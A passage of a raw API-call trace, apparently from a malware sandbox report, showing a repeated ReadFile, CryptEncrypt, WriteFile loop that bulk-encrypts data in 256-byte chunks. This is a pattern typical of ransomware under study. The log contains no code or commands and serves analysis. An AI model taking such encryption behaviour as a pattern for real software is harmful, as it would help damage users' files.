lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.015] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.015] GetLastError () returned 0x0 [0173.015] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.015] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.015] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.015] GetLastError () returned 0x0 [0173.015] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.015] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.015] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.015] GetLastError () returned 0x0 [0173.015] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.015] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.015] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.015] GetLastError () returned 0x0 [0173.015] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.015] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.015] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.015] GetLastError () returned 0x0 [0173.015] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.015] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.015] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.015] GetLastError () returned 0x0 [0173.015] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.015] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.016] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.016] GetLastError () returned 0x0 [0173.016] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.016] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.016] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.016] GetLastError () returned 0x0 [0173.016] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.016] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.016] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.016] GetLastError () returned 0x0 [0173.016] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.016] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.016] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.016] GetLastError () returned 0x0 [0173.016] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.016] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.016] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.016] GetLastError () returned 0x0 [0173.016] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.016] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.016] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.016] GetLastError () returned 0x0 [0173.016] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.016] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.016] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.016] GetLastError () returned 0x0 [0173.017] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.017] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.017] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.017] GetLastError () returned 0x0 [0173.017] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.017] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.017] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.017] GetLastError () returned 0x0 [0173.017] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.017] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.017] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.017] GetLastError () returned 0x0 [0173.017] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.017] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.017] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.017] GetLastError () returned 0x0 [0173.017] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.017] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.017] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.017] GetLastError () returned 0x0 [0173.017] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.017] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.017] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.017] GetLastError () returned 0x0 [0173.017] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.018] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.018] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.018] GetLastError () returned 0x0 [0173.018] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.018] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.018] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.018] GetLastError () returned 0x0 [0173.018] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.018] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.018] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.018] GetLastError () returned 0x0 [0173.018] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.019] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.019] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.019] GetLastError () returned 0x0 [0173.019] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.019] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.019] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.019] GetLastError () returned 0x0 [0173.019] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.019] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.019] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.019] GetLastError () returned 0x0 [0173.019] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.019] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.019] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.019] GetLastError () returned 0x0 [0173.019] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.020] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.020] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.020] GetLastError () returned 0x0 [0173.020] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.020] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.020] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.020] GetLastError () returned 0x0 [0173.020] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.020] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.020] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.020] GetLastError () returned 0x0 [0173.020] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.020] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.020] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.020] GetLastError () returned 0x0 [0173.020] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.020] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.020] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0173.020] GetLastError () returned 0x0 [0173.020] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0173.021] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0173.021] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, 